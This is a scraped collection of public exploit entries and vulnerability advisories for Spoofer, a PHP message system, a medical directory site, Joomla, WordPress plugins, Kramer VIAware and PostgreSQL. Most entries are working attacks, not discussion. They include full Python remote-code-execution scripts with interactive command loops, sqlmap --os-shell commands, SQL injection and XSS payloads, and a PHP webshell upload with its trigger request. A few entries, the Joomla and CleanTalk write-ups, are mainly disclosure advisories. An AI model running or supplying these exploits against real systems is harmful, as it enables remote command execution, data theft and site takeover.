<pre><code># Exploit Title: Spoofer 1.4.6 – Local Privilege Escalation via Unquoted Service Path <br /># Date: 24/01/2022 <br /># Exploit Author: Asim Sattar (@M_Asim_1) <br /># Vendor Homepage: https://www.caida.org/projects/spoofer/ <br /># Software Link: https://www.caida.org/projects/spoofer/downloads/Spoofer-1.4.6-win32.exe<br /># Version: 1.4.6 <br /># Tested: Windows 10 (x64) <br /># CVE: CVE-2021-46443<br /><br /><br /><br />Description:<br /><br />-------------<br /><br /><br /><br />Caida Spoofer 1.4.6 installs a service (spoofer-scheduler) with an unquoted<br />service path. Since this service is running as SYSTEM, this creates a local<br />privilege escalation vulnerability. To properly exploit this vulnerability,<br />a local attacker can insert an executable in the path of the service.<br />Rebooting the system or restarting the service will run the malicious<br />executable with elevated privileges.<br /><br /><br /><br />------------------<br /><br />Proof of Concept:<br /><br />------------------<br /><br /><br /><br />C:\Users\asim.sattar>wmic service get name,pathname,displayname,startmode |<br />findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """<br /><br />Spoofer Scheduler spoofer-scheduler C:\Program Files<br />(x86)\Spoofer\spoofer-scheduler.exe Auto<br /><br /><br /><br />C:\Users\asim.sattar>sc qc "spoofer-scheduler"<br /><br />[SC] QueryServiceConfig SUCCESS<br /><br /><br /><br />SERVICE_NAME: spoofer-scheduler<br /><br /> TYPE : 10 WIN32_OWN_PROCESS<br /><br /> START_TYPE : 2 AUTO_START<br /><br /> ERROR_CONTROL : 1 NORMAL<br /><br /> BINARY_PATH_NAME : C:\Program Files<br />(x86)\Spoofer\spoofer-scheduler.exe<br /><br /> LOAD_ORDER_GROUP :<br /><br /> TAG : 0<br /><br /> DISPLAY_NAME : Spoofer Scheduler<br /><br /> DEPENDENCIES : tcpip<br /><br /> SERVICE_START_NAME : LocalSystem<br /><br /><br /><br />Regards,<br /><br />Asim Sattar<br /></code></pre>
<pre><code># Title: Message System 1.0 1.0 Blind Time SQLi To Rce<br /># Author: Hejap Zairy<br /># Date: 30.07.2022<br /># Vendor: https://www.sourcecodester.com/php/15249/message-system-phpoop-free-source-code.html<br /># Software:https://www.sourcecodester.com/sites/default/files/download/oretnom23/pmms_1.zip<br /># Reference: https://github.com/Matrix07ksa<br /># Tested on: Windows, MySQL, Apache<br /><br /><br /><br /># Steps<br /># 1.- Go to : https://0day.gov//pmms/?page=view_message&id=1<br /># 2 - manual inject Blind SQli Payload: https://0day.gov/pmms/?page=view_message&id=1' OR NOT 515=515#&password=hejap&button=Login<br /># 3 - SQLi To RCE r00t<br /># 4 - Ubload webshell <br /># 5 - Web Shell to meterpreter full tty shell<br /><br />#vulnerability Code php<br /><br />---<br />```<br /><?php <br />$qry = $conn->query("SELECT * FROM `conversation_list` where id = '{$_GET['id']}' and (`user_1` = '{$_settings->userdata('id')}' or `user_2` = '{$_settings->userdata('id')}') ");<br />if($qry->num_rows > 0){<br /> foreach($qry->fetch_array() as $k => $v){<br /> if(!is_numeric($k))<br /> $$k = $v;<br /> }<br /> $msg = $conn->query("SELECT m.*,CONCAT(u.firstname,' ', COALESCE(u.middlename,''), ' ', u.lastname) as `name`, u.username, u.avatar FROM `message_list` m inner join users u on m.from_user = u.id where m.conversation_id = '{$id}' order by unix_timestamp(m.date_updated) asc limit 1 ")->fetch_array();<br /> $conn->query("UPDATE `message_list` set `status` = 1 where conversation_id = '{$id}' and to_user = '{$_settings->userdata('id')}'");<br />}<br />else{<br /> echo "<script>alert('ID is unknown or you dont have access to view the Message.'); location.replace('./?page=inbox');</script>";<br />}<br />?><br />```<br />---<br />#Status: CRITICAL<br />[+] Payload GET<br /><br />---<br />GET /pmms/?page=view_message&id=1 HTTP/1.1<br />Host: 0day.gov<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Connection: close<br />Cookie: PHPSESSID=fcmu4ss9vhq6760poojbtk40bt<br />Upgrade-Insecure-Requests: 1<br />---<br /><br />```<br />---<br />Parameter: id (GET)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: page=view_message&id=1' AND (SELECT 4539 FROM (SELECT(SLEEP(5)))sFek) AND 'MXDw'='MXDw<br />---<br /><br /><br />```<br />#Blind SQLi Time to Rce<br />#ُExploit <br /><br /><br />sqlmap -r hejap_0day --dbs --time-sec=10 --tamper=space2comment --threads=5 -p id -D pmms_db -T users --dump --eta --technique=t --hex --os-shell<br /><br /><br /># Description:<br />The Blind Time SQLi vulnerability was converted to rce due to the permissions I have in the database and it was privesc<br /><br /># Proof and Exploit:<br />https://i.imgur.com/HfDGPGT.png<br />https://i.imgur.com/6RH1Wvi.png<br /></code></pre>
<pre><code>## Title: Message System 1.0 1.0 XSS Stored <br /># Author: Hejap Zairy<br /># Date: 29.07.2022<br /># Vendor: https://www.sourcecodester.com/php/15249/message-system-phpoop-free-source-code.html<br /># Software:https://www.sourcecodester.com/sites/default/files/download/oretnom23/pmms_1.zip<br /># Reference: https://github.com/Matrix07ksa<br /># Tested on: Windows, MySQL, Apache<br /><br /><br />## Description:<br />Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application. Reflected XSS involves the reflecting of a malicious script off of a web application, onto a user's browser.<br /><br />Status: CRITICAL<br />[+] Payloads:<br />```<br />https://0day.gov/pmms/?page=manage_message <br />> Subject<br /><img src=1 href=1 onerror="javascript:alert('HEJAP ZAIRY AL-SHARIF')"></img><br />```<br /><br />## Proof and Exploit:<br />https://i.imgur.com/ZcoLfS2.png<br />https://i.imgur.com/Fl68YTs.png<br />https://i.imgur.com/2GhIH1a.png<br /></code></pre>
<pre><code>-------------------------------------------------<br />Joomla! <= 4.1.0 (Tar.php) Zip Slip Vulnerability<br />-------------------------------------------------<br /><br /><br />[-] Software Link:<br /><br />http://www.joomla.org/<br /><br /><br />[-] Affected Versions:<br /><br />Version 4.1.0 and prior versions.<br />Version 3.10.6 and prior versions.<br /><br /><br />[-] Vulnerability Description:<br /><br />The vulnerability is located in the <br />/libraries/vendor/joomla/archive/src/Tar.php script. Specifically, into <br />the Joomla\Archive\Tar::extract() method:<br /><br />113. $this->getTarInfo($this->data);<br />114.<br />115. for ($i = 0, $n = \count($this->metadata); $i < $n; $i++)<br />116. {<br />117. $type = strtolower($this->metadata[$i]['type']);<br />118.<br />119. if ($type == 'file' || $type == 'unix file')<br />120. {<br />121. $buffer = $this->metadata[$i]['data'];<br />122. $path = Path::clean($destination . '/' . <br />$this->metadata[$i]['name']);<br />123.<br />124. // Make sure the destination folder exists<br />125. if (!Folder::create(\dirname($path)))<br />126. {<br />127. throw new \RuntimeException('Unable to create destination <br />folder ' . \dirname($path));<br />128. }<br />129.<br />130. if (!File::write($path, $buffer))<br />131. {<br />132. throw new \RuntimeException('Unable to write entry to file ' . <br />$path);<br />133. }<br />134. }<br />135. }<br /><br />The vulnerability exists because the above code is using the filename <br />within the Tar archive ($path variable created at line 122) to write the <br />extracted file by using File::write() at line 130, without properly <br />verifying the destination path. This could be exploited to carry out Zip <br />Slip (or Path Traversal) attacks and write/overwrite arbitrary files, <br />potentially resulting in execution of arbitrary PHP code or other <br />dangerous impacts. In the Joomla! core, successful exploitation of this <br />vulnerability would require administrator privileges. However, there <br />could be third-party components using the <br />Joomla\Archive\Archive::extract() method. In such cases, this might <br />potentially be exploited also by unauthenticated attackers, depending on <br />the context.<br /><br /><br /><br />[-] Solution:<br /><br />Upgrade to version 3.10.7, 4.1.1, or later.<br /><br /><br />[-] Disclosure Timeline:<br /><br />[19/02/2021] - Vendor notified<br />[21/02/2021] - Vulnerability acknowledged by the vendor<br />[21/02/2021] - Vendor sent details about a proposed patch<br />[21/02/2021] - Sent feedback about the patch correctness<br />[29/03/2022] - Vendor update released<br />[29/03/2022] - Public disclosure<br /><br /><br />[-] CVE Reference:<br /><br />The Common Vulnerabilities and Exposures project (cve.mitre.org)<br />has assigned the name CVE-2022-23793 to this vulnerability.<br /><br /><br />[-] Credits:<br /><br />Vulnerability discovered by Egidio Romano.<br /><br /><br />[-] Other References:<br /><br />https://developer.joomla.org/security-centre/870-20220301<br /><br /><br />[-] Original Advisory:<br /><br />http://karmainsecurity.com/KIS-2022-05<br /><br /></code></pre>
<pre><code># Exploit Title: WordPress Plugin Easy Cookie Policy 1.6.2 - Broken Access Control to Stored XSS<br /># Date: 2/27/2021<br /># Author: 0xB9<br /># Software Link: https://wordpress.org/plugins/easy-cookies-policy/<br /># Version: 1.6.2<br /># Tested on: Windows 10<br /># CVE: CVE-2021-24405<br /><br />1. Description:<br />Broken access control allows any authenticated user to change the cookie banner through a POST request to admin-ajax.php.<br />If users can't register, this can be done through CSRF.<br /><br />2. Proof of Concept:<br />POST http://localhost/wp-admin/admin-ajax.php HTTP/1.1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0<br />Accept: application/json, text/javascript, /; q=0.01<br />Accept-Language: en-US,en;q=0.5<br />Referer: http://localhost/wp-admin/options-general.php?page=easy-cookies-policy<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />Content-Length: 226<br />Origin: http://localhost<br />Connection: keep-alive<br />Host: localhost<br />Cookie: [Any authenticated user]<br /><br />action=easy_cookies_policy_save_settings&maintext=<script>alert(1)</script>&background=black&transparency=90&close=accept&expires=365&enabled=true&display=fixed&position=top&button_text=Accept&text_color=#dddddd<br /><br /></code></pre>
<pre><code>Description: Reflected Cross-Site Scripting<br /><br />Affected Plugin: Spam protection, AntiSpam, FireWall by CleanTalk<br /><br />Plugin Slug: cleantalk-spam-protect<br /><br />Plugin Developer: CleanTalk<br /><br />Affected Versions: <= 5.173<br /><br />CVE ID: CVE-2022-28221<br /><br />CVSS Score: 6.1 (Medium)<br /><br />CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N <br /><br />Researcher/s: Ramuel Gall<br /><br />Fully Patched Version: 5.174.1<br /><br />CleanTalk is a WordPress plugin designed to protect websites from spam comments and registrations. One of the features it includes is the ability to check comments for spam and present the spammy comments for deletion.<br /><br />The plugin uses the column_ct_comment function in /lib/Cleantalk/ApbctWP/FindSpam/ListTable/Comments.php to display the list of spam comments, and in doing so generates links to approve, trash, or mark comments as spam using the value supplied in $_REQUEST[‘page’].<br /><br />Thanks to a quirk of how WordPress processes the page parameter and the default PHP request order, it is possible to use this parameter to perform a reflected cross-site scripting attack, which is almost identical to a vulnerability we recently covered (https://email.wordfence.com/e3t/Ctc/GC+113/cwG7R04/VWyH9-9bcDccVffKwW5h910xVGwS3m4HgybWN2_Qd573kWFJV1-WJV7CgNgvN4sk7l6S5pYhW3RwYHq6GsK6QW1pJKcl8MWFK3W74DmyG8pyJrYW97sldm92C9V8W7wHKz25sqYtkW3QYgc52jFss-W5XxnmS5gbpMsW8gngml2WrRZ2W5jMKx748WfY9W1yWfPC28Gsd4W6L9b-g3pPQMtW6JjfWK8syNZbVj0Tfp9c9H45N2vP0sncLYbLW24s2rZ5y93x3W6Th-0s5SM_BMW8VBJRF8V7x8rW1Q-S3z1P9xLFW92hLnf1McrkFW8V_VDm7FM-3wW77pxyw7Tqk7GW8rcxNX6Y6pjlMyZK3MHZ8FrW7wzdJ7927wH8W1ntpm38D4Xm432XB1 ) .<br /><br />The vulnerability can be used to execute JavaScript in the browser of a logged-in administrator, for instance, by tricking them into visiting a self-submitting form that sends a POST request to the site at wp-admin/edit-comments.php?page=ct_check_spam, with the $_POST[‘page’] parameter set to malicious JavaScript.<br /><br />As with any Cross-Site Scripting vulnerability, executing JavaScript in an administrator’s session can be used to take over a site by adding a new malicious administrator or injecting a backdoor, among other potential methods.<br /><br />Description: Reflected Cross-Site Scripting<br /><br />Affected Plugin: Spam protection, AntiSpam, FireWall by CleanTalk<br /><br />Plugin Slug: cleantalk-spam-protect<br /><br />Plugin Developer: CleanTalk<br /><br />Affected Versions: <= 5.173<br /><br />CVE ID: CVE-2022-28222<br /><br />CVSS Score: 6.1 (Medium)<br /><br />CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N <br /><br />Researcher/s: Ramuel Gall<br /><br />Fully Patched Version: 5.174.1<br /><br />Similar to the spam comment functionality, CleanTalk also includes a feature that checks for spammy users and presents them in a similar table for review and deletion.<br /><br />In this case the vulnerable function is column_ct_username in /lib/Cleantalk/ApbctWP/FindSpam/ListTable/Users.php, which uses the value of $_REQUEST[‘page’] to generate links to delete potentially spammy users.<br /><br />As with the spam comment vulnerability, if an administrator can be tricked into performing an action, it is possible to use JavaScript running in their browser to take over a site.<br /><br />Timeline<br /><br />February 15, 2022 – The Wordfence Threat Intelligence team finishes our investigation and verifies that the Wordfence firewall’s built-in protection is sufficient to block exploit attempts. We send the full disclosure to a contact at CleanTalk that we have successfully disclosed vulnerabilities to in the past.<br /><br />March 22, 2022 – As we have not yet heard back from our contact, we reported the vulnerability to the WordPress plugins team.<br /><br />March 25, 2022 - A patched version of the plugin, 5.174.1, becomes available.<br /><br />Conclusion<br /><br />In today’s article, we covered two nearly identical reflected Cross-Site Scripting vulnerabilities in the Spam protection, AntiSpam, FireWall by CleanTalk plugin for WordPress. While both of these vulnerabilities require some degree of social engineering, both could be used for site takeover.<br /><br /></code></pre>
<pre><code># Exploit Title: Kramer VIAware 2.5.0719.1034 - Remote Code Execution (RCE)<br /># Date: 28/03/2022<br /># Exploit Author: sharkmoos & BallO<br /># Vendor Homepage: https://www.kramerav.com/<br /># Software Link: https://www.kramerav.com/us/product/viaware<br /># Version: 2.5.0719.1034<br /># Tested on: ViaWare Go (Windows 10)<br /># CVE : CVE-2019-17124<br /><br />import requests, sys, urllib3<br />urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)<br /><br />def adminLogin(s, host, username, password):<br /> headers = {<br /> "Host": f"{host}",<br /> "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0",<br /> "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",<br /> "Accept-Language": "en-GB,en;q=0.5",<br /> "Accept-Encoding": "gzip, deflate",<br /> "Content-Type": "application/x-www-form-urlencoded",<br /> "Origin": f"https://{host}",<br /> "Referer": f"https://{host}/admin/login.php",<br /> "Upgrade-Insecure-Requests": "1",<br /> "Sec-Fetch-Dest": "document",<br /> "Sec-Fetch-Mode": "navigate",<br /> "Sec-Fetch-Site": "same-origin",<br /> "Sec-Fetch-User": "?1",<br /> "Sec-Gpc": "1",<br /> "Te": "trailers",<br /> "Connection": "close"<br /> }<br /> data = {<br /> "txtUserId": username,<br /> "txtPwd": password,<br /> "btnOk" :"Login"<br /> }<br /> response = s.post(f"https://{host}/admin/login.php", verify=False)<br /> if len(s.cookies) < 1:<br /> return False<br /> else:<br /> return True<br /><br /><br />def writeCommand(session, host, command):<br /> headers = {<br /> "Host": f"{host}",<br /> "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0",<br /> "Accept": "text/html, */*",<br /> "Accept-Language": "en-GB,en;q=0.5",<br /> "Accept-Encoding": "gzip, deflate",<br /> "Content-Type": "application/x-www-form-urlencoded",<br /> "X-Requested-With": "XMLHttpRequest",<br /> "Origin": f"https://{host}",<br /> "Referer": f"https://{host}/browseSystemFiles.php?path=C:\Windows&icon=browser",<br /> "Sec-Fetch-Dest": "empty",<br /> "Sec-Fetch-Mode": "cors",<br /> "Sec-Fetch-Site": "same-origin",<br /> "Sec-Gpc": "1",<br /> "Te": "trailers",<br /> "Connection": "close"<br /> }<br /> data = {<br /> "radioBtnVal":f"{command}",<br /> "associateFileName": "C:/tc/httpd/cgi-bin/exploit.cmd"<br /> }<br /> session.post(f"https://{host}/ajaxPages/writeBrowseFilePathAjax.php", headers=headers, data=data)<br /><br /><br />def getResult(session, host):<br /> file = session.get(f"https://{host}/cgi-bin/exploit.cmd", verify=False)<br /> pageText = file.text<br /> if len(pageText) < 1:<br /> result = "Command did not return a result"<br /> else:<br /> result = pageText<br /> return result<br /><br /> <br /><br />def main(host, username="su", password="supass"):<br /> s = requests.Session()<br /> # comment this line to skip the login stage <br /> loggedIn = adminLogin(s, host, username, password)<br /> <br /> if not loggedIn:<br /> print("Could not successfully login as the admin")<br /> sys.exit(1)<br /> else:<br /> pass<br /><br /> command = ""<br /> while command != "exit":<br /> command = input("cmd:> ").strip()<br /> writeCommand(s, host, command)<br /> print(getResult(s, host))<br /> exit()<br /><br />if __name__ == "__main__":<br /> <br /> args = sys.argv<br /> numArgs = len(args)<br /> if numArgs < 2:<br /> print(f"Run script in format:\n\n\tpython3 {args[0]} target\n")<br /> print(f"[Optional] Provide Admin Credentials\n\n\tpython3 {args[0]} target su supass")<br /> if numArgs == 2:<br /> main(args[1])<br /> if numArgs == 4:<br /> main(args[1], args[2], args[3])<br /> if numArgs > 4:<br /> print(f"Run script in format:\n\n\tpython3 {args[0]} target\n")<br /> print(f"[Optional] Provide Admin Credentials\n\n\tpython3 {args[0]} target su supass")<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: PostgreSQL 9.3-11.7 - Remote Code Execution (RCE) (Authenticated)<br /># Date: 2022-03-29<br /># Exploit Author: b4keSn4ke<br /># Github: https://github.com/b4keSn4ke<br /># Vendor Homepage: https://www.postgresql.org/<br /># Software Link: https://www.postgresql.org/download/linux/debian/<br /># Version: 9.3 - 11.7<br /># Tested on: Linux x86-64 - Debian 4.19<br /># CVE: CVE-2019–9193<br /><br />#!/usr/bin/python3 <br /><br />import psycopg2<br />import argparse<br />import hashlib<br />import time<br /><br />def parseArgs():<br /> parser = argparse.ArgumentParser(description='CVE-2019–9193 - PostgreSQL 9.3-11.7 Authenticated Remote Code Execution')<br /> parser.add_argument('-i', '--ip', nargs='?', type=str, default='127.0.0.1', help='The IP address of the PostgreSQL DB [Default: 127.0.0.1]')<br /> parser.add_argument('-p', '--port', nargs='?', type=int, default=5432, help='The port of the PostgreSQL DB [Default: 5432]')<br /> parser.add_argument('-d', '--database', nargs='?', default='template1', help='Name of the PostgreSQL DB [Default: template1]')<br /> parser.add_argument('-c', '--command', nargs='?', help='System command to run')<br /> parser.add_argument('-t', '--timeout', nargs='?', type=int, default=10, help='Connection timeout in seconds [Default: 10 (seconds)]')<br /> parser.add_argument('-U', '--user', nargs='?', default='postgres', help='Username to use to connect to the PostgreSQL DB [Default: postgres]')<br /> parser.add_argument('-P', '--password', nargs='?', default='postgres', help='Password to use to connect to the the PostgreSQL DB [Default: postgres]')<br /> args = parser.parse_args()<br /> return args<br /><br />def main():<br /> try:<br /> print ("\r\n[+] Connecting to PostgreSQL Database on {0}:{1}".format(args.ip, args.port))<br /> connection = psycopg2.connect (<br /> database=args.database, <br /> user=args.user, <br /> password=args.password, <br /> host=args.ip, <br /> port=args.port, <br /> connect_timeout=args.timeout<br /> )<br /> print ("[+] Connection to Database established")<br /> <br /> print ("[+] Checking PostgreSQL version")<br /> checkVersion(connection)<br /><br /> if(args.command):<br /> exploit(connection)<br /> else:<br /> print ("[+] Add the argument -c [COMMAND] to execute a system command")<br /><br /> except psycopg2.OperationalError as e:<br /> print ("\r\n[-] Connection to Database failed: \r\n{0}".format(e))<br /> exit()<br /><br />def checkVersion(connection):<br /> cursor = connection.cursor()<br /> cursor.execute("SELECT version()")<br /> record = cursor.fetchall()<br /> cursor.close()<br /><br /> result = deserialize(record)<br /> version = float(result[(result.find("PostgreSQL")+11):(result.find("PostgreSQL")+11)+4])<br /><br /> if (version >= 9.3 and version <= 11.7):<br /> print("[+] PostgreSQL {0} is likely vulnerable".format(version))<br /><br /> else:<br /> print("[-] PostgreSQL {0} is not vulnerable".format(version))<br /> exit()<br /><br />def deserialize(record):<br /> result = ""<br /> for rec in record:<br /> result += rec[0]+"\r\n"<br /> return result<br /><br />def randomizeTableName():<br /> return ("_" + hashlib.md5(time.ctime().encode('utf-8')).hexdigest())<br /><br />def exploit(connection):<br /> cursor = connection.cursor()<br /> tableName = randomizeTableName()<br /> try:<br /> print ("[+] Creating table {0}".format(tableName))<br /> cursor.execute("DROP TABLE IF EXISTS {1};\<br /> CREATE TABLE {1}(cmd_output text);\<br /> COPY {1} FROM PROGRAM '{0}';\<br /> SELECT * FROM {1};".format(args.command,tableName))<br /><br /> print ("[+] Command executed\r\n")<br /> <br /> record = cursor.fetchall()<br /> result = deserialize(record)<br /><br /> print(result)<br /> print ("[+] Deleting table {0}\r\n".format(tableName))<br /><br /> cursor.execute("DROP TABLE {0};".format(tableName))<br /> cursor.close()<br /><br /> except psycopg2.errors.ExternalRoutineException as e:<br /> print ("[-] Command failed : {0}".format(e.pgerror))<br /> print ("[+] Deleting table {0}\r\n".format(tableName))<br /> cursor = connection.cursor()<br /> cursor.execute("DROP TABLE {0};".format(tableName))<br /> cursor.close()<br /><br /> finally:<br /> exit()<br /><br />if __name__ == "__main__":<br /> args = parseArgs()<br /> main()<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: Medical Hub Directory Site - 'id' SQL Injection<br /># Date: 30/03/2022<br /># Exploit Author: Saud Alenazi<br /># Vendor Homepage: https://www.sourcecodester.com/<br /># Software Link: https://www.sourcecodester.com/php/15252/simple-medical-hub-directory-site-phpoop-source-code.html<br /># Version: 1.0<br /># Tested on: XAMPP, Linux<br /><br /><br /># Vulnerable Code<br /><br />line 9 in file "/mhds/clinic/view_details.php"<br /><br />$categories = $conn->query("SELECT c.category_id,cc.name as category FROM clinic_category c inner join category_list cc on c.category_id = cc.id where c.clinic_id = '{$id}' ")->fetch_all(MYSQLI_ASSOC);<br /><br /># Sqlmap command:<br /><br />sqlmap -u 'http://localhost/mhds/?page=clinic/view_details&id=1' -p id --level=5 --risk=3 --dbs --random-agent --eta<br /><br /># Output:<br /><br />Parameter: id (GET)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause<br /> Payload: page=clinic/view_details&id=1' AND 8622=8622-- pBEY<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: page=clinic/view_details&id=1' AND (SELECT 9741 FROM (SELECT(SLEEP(5)))AmHc)-- Gwec<br /><br /> Type: UNION query<br /> Title: Generic UNION query (NULL) - 10 columns<br /> Payload: page=clinic/view_details&id=-4315' UNION ALL SELECT CONCAT(0x71717a7071,0x4d5246716246517044556c4d4a584f5853646d526a6957666463567a514f73504745636759635454,0x71786a7671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -<br /></code></pre>
<pre><code># Title: Medical Hub Directory Site 1.0 Shell Upload<br /># Author: Hejap Zairy<br /># Date: 30.07.2022<br /># Vendor: https://www.sourcecodester.com/php/15252/simple-medical-hub-directory-site-phpoop-source-code.html<br /># Software:https://www.sourcecodester.com/sites/default/files/download/oretnom23/mhds.zip<br /># Reference: https://github.com/Matrix07ksa<br /># Tested on: Windows, MySQL, Apache<br /><br /><br />registered user can bypass waf upload .php.png files in attachments section with use of intercept tool in burbsuite to edit the raw<br /><br /><br />#vulnerability Code php<br />Needs more filtering to upload profile files<br /><br />php```<br />$img_err= "";<br /> if(isset($_FILES['img']) && $_FILES['img']['tmp_name'] != ''){<br /> $fname = 'uploads/system-logo.png';<br /> $dir_path =base_app. $fname;<br /> $upload = $_FILES['img']['tmp_name'];<br /> $type = mime_content_type($upload);<br /> $allowed = array('image/png','image/jpeg');<br /> if(!in_array($type,$allowed)){<br /> $img_err.=" But Logo Image failed to upload due to invalid file type.";<br /> }else{<br /> // $new_height = 200; <br /> // $new_width = 200; <br /> <br /> list($width, $height) = getimagesize($upload);<br /> $t_image = imagecreatetruecolor($width, $height);<br /> $black = imagecolorallocate($t_image, 0, 0, 0);<br /> imagecolortransparent($t_image, $black);<br /> imagealphablending( $t_image, false );<br /> imagesavealpha( $t_image, true );<br /> $gdImg = ($type == 'image/png')? imagecreatefrompng($upload) : imagecreatefromjpeg($upload);<br /> imagecopyresampled($t_image, $gdImg, 0, 0, 0, 0, $width, $height, $width, $height);<br /> if($gdImg){<br /> if(is_file($dir_path))<br /> unlink($dir_path);<br /> $uploaded_img = imagepng($t_image,$dir_path);<br /> if($uploaded_img){<br /> if(isset($_SESSION['system_info']['logo'])){<br /> $qry = $this->conn->query("UPDATE system_info set meta_value = CONCAT('{$fname}','?v=',unix_timestamp(CURRENT_TIMESTAMP)) where meta_field = 'logo' ");<br /> }else{<br /> $qry = $this->conn->query("INSERT into system_info set meta_value = CONCAT('{$fname}','?v=',unix_timestamp(CURRENT_TIMESTAMP)),meta_field = 'logo' ");<br /> }<br /> }<br /> imagedestroy($gdImg);<br /> imagedestroy($t_image);<br /> }else{<br /> $img_err.=" But Logo Image failed to upload due to unkown reason.";<br /> }<br /> }<br /> }<br />```<br /><br /><br />[+] Payload POST<br /><br /><br />```<br />POST /mhds/admin/?page=manage_account HTTP/1.1<br />Host: 0day.gov<br />Cookie: PHPSESSID=2vah9hmhjf85ichdav814rhcgu<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: multipart/form-data; boundary=---------------------------409902128312379197203124536738<br />Content-Length: 882<br />Origin: https://0day.gov<br />Referer: https://0day.gov/mhds/<br />Upgrade-Insecure-Requests: 1<br />Te: trailers<br />Connection: close<br /><br />-----------------------------409902128312379197203124536738<br />Content-Disposition: form-data; name="productName"<br />Hejap Zairy<br />-----------------------------409902128312379197203124536738<br />Content-Disposition: form-data; name="productimage1"; filename="0day_hejap.php"<br />Content-Type: image/png<br /><br /><?=`$_GET[515]`?><br /><br />-----------------------------409902128312379197203124536738<br />Content-Disposition: form-data; name="submit"<br />-----------------------------409902128312379197203124536738--<br />```<br /><br /><br />#Status: CRITICAL<br /><br />[+] Payload GET<br /><br />```<br />GET /mhds/uploads/users/0day_hejap.png.php?515=echo+Hejap+Zairy HTTP/1.1<br /><br />Host: 0day.gov<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Connection: close<br />Cookie: PHPSESSID=pqbgvck1gedt9if6p582nt9a41<br />Upgrade-Insecure-Requests: 1<br /><br /><br /><br /><br />```<br /><br />#Response <br />```<br />HTTP/1.1 200 OK<br />Date: Thu, 30 Mar 2022 11:15:56 GMT<br />Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27<br />X-Powered-By: PHP/7.4.27<br />Content-Length: 12<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br /><br />Hejap Zairy<br />```<br /><br /><br /># Description:<br />The file upload bypass WAF vulnerability occurs when the user uploads an executable script file, and through the script file to obtain the ability to execute server-side commands. This attack is the most direct and effective, sometimes having almost no technical barriers.<br /><br /><br /># Proof and Exploit:<br />https://i.imgur.com/N9rKLB4.png<br />https://i.imgur.com/CrpqRox.png<br />https://i.imgur.com/Un1sM4Q.png<br /><br /><br /><br /></code></pre>